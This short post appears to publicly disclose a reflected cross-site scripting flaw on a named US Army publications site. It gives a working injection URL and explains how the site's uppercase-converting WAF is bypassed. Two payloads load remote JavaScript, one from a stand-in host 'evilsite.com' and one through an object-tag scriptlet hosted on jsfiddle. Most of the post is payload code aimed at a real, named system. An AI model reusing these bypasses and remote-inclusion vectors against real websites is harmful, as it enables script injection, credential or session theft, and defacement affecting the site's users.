US Army - Reflective XSS - WAF Bypassed
HTML Injection:

Code:
http://www.apd.army.mil/AdminPubs/searchtitle_number_pubs.asp?xradio=pubnum&search=%22%3E%3Cmarquee%3EXSS%20Here%3C/marquee%3E

The WAF converts all lowercase input to uppercase; JavaScript, being case sensitive, therefore does not execute in the intended manner, stopping an alert from being achieved. There are a few ways of bypassing this:

Method 1 (working in IceWeasel but not Firefox):

The following vector can be used to remotely include the JavaScript, using // in place of http:// to bypass another filter put in place:

Code:
"></title><script/src="//www.evilsite.com/1.JS"></script>

This gets around the case-sensitivity issue, with the contents of 1.JS being <script>alert("something")</script>

Method 2 (working in multiple browsers):

Now time for an agnostic vector using the <object> tag to remotely include some JavaScript:

Code:
"></title><object type="text/x-scriptlet" data="http://jsfiddle.net/fb5upheq"></object>
